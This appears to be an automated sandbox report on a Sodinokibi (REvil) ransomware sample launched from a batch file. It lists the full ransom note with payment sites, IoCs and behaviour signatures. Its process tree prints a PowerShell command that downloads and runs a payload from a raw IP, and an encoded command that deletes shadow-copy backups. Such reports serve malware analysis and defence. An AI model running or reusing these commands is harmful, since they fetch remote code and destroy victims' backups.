Analysis

  • max time kernel
    140s
  • resource
    win7v191014
  • submitted
    16-12-2019 11:10

General

  • Target

    RKSMMKvy.bat

  • Sample

    191216-8e2x7afq6x

  • SHA256

    b9269af79a7cd80e9d3f2d664b6ca4290dd45c34a17e274f97b15c16f96d6bbe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/RKSMMKvy

Extracted

Language
ps1
Source

Extracted

Path

C:\8pw8hwno77-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension 8pw8hwno77. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/30C76631120F4269 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/30C76631120F4269 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: wDSxKNcXaD/pMSL/XYGCIKlJWAKuZ0HliBB5A4kyvbCyEK2NnigUocrrxy29wW9c 1QevaPK3T31C8FilGk01FGFpfWrSxWUOws7vBaBeTzp/rtAT/CvjYssmpavQgMhJ +VdNPbiL8GCa5wy3EgF8yMPkVtRtrCiOaVSEEkdvqnanP5dqmzGxvfJJ+a0efYPk E2u0vGTrxc5hrZwC2xZhFfNXNalH9OsKoVCFuFISwDc9n+kKIiYNdvuwKDI9sKaL u9BK5zjG0AcXaE6P3nFwkyTdfvD6rOInIzLSnnp3950qgL/3o7d7I3hZCFtUGAMD 9IKrbuQfLgUyg7dc9pUCQrvvgpGoGqUlIUP3vqFDABUooGg5XWth77h3WrhaTAvk n19rNjfsBP+sVQR+1uv0SysddL1mc7XA09PPvIwPw7HulfM/Yzu4N6NEUzXHl+Ez X9/pKVQLw86ONutwrFMW2vSGcBHq//r2ohrKsNCIWgGEYUXLDoLyEupOBw4kfvZv QlmtVeh4Y97juwVcN2edNMB/fCEM23ZUiPiTN1t9R7fO8XxNjCqhVYoDI8ihX4+v v1FYsZSv6HY4/UXG+KLtDsm44HKH2BXSViwQJAimGp3gP1YTfFmeiVo9XP3PtjBc 1Nyps1hFv6uuWN+HBCHUkElUKtSzYMSvEAxIdnK0IbcrTXv+z6VwtBDIE2EPwRTF A1CHyszxzhcpnk5xJqWFk9Z0pvcLmxFaVS870olpZpm/nzlc/Q0ws1eGeKqDI33V KjgWTnv8cQMB1cB38xjaCEq4bAM7qP023Q/et+ku7Rzmxa+gF1Hj8FU3KMyUxFnS ezU3ERu5AEGAPntgpRP6/HIR63B2JoTaY5SqWNc/CIvv7kf6FyM2rlkg59StecCd YasUA4rrhCvaDjVPopFZlG5Y6rZXdAXbCpyKyQXExxyiCaI5qGlswteICbLzI4vl Hwf7I9RBclODkAo9AiEwpsTIdqc6z9M39rWfC9EsWbnWN3dPXExMWyThB7hkZDgn n0i2nU7I710OVKAJcKN51LxIw8sOJthTVym5+3WlOEeOClyXDIFMgrTF9Yv4wFsd yQw0LHDr1kSij5aFNsUHwtYum7m1dSYk+dIfwqwMZ/M4zt0NnrCWpFsFCdmoyNge 6iA5UtLXLhSpja1bjNkDY/6ojGE= Extension name: 8pw8hwno77 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/30C76631120F4269

http://decryptor.top/30C76631120F4269

Signatures

  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality

  • Adds Run entry to start application 2 TTPs 1 IoCs
  • Drops file in Program Files directory 33 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Discovering connected drives 3 TTPs 7 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\RKSMMKvy.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Discovering connected drives
    PID:1308
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/RKSMMKvy');Invoke-ISHKUAPZED;Start-Sleep -s 10000"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Drops file in Program Files directory
      • Drops file in System32 directory
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: EnumeratesProcesses
      • Discovering connected drives
      PID:1376
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        • Discovering connected drives
        PID:1908
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-2117303482285217065628765622-146893970383285239-13794829241384242245306646765"
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:828
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "1536848138253499463-163022004-15684493871335174701-10249533651716853959-2048248036"
    1⤵
      PID:1916
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1368

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4628e689-d195-4873-bc54-2194d7d68777

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_512b5fbe-a222-4c41-85f8-7f61ee5ca5bd

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c6be20a0-2b44-41e6-b03e-788e1380648b

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c85534f7-abc2-478b-a265-18e03f17967d

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_eb154db7-5347-459d-a5ae-f27e0827e401

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ef13c2a6-fcdf-474f-b686-be9a419bd5e9

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    • memory/1376-2-0x00000000055E0000-0x00000000055E2000-memory.dmp

      Filesize

      8KB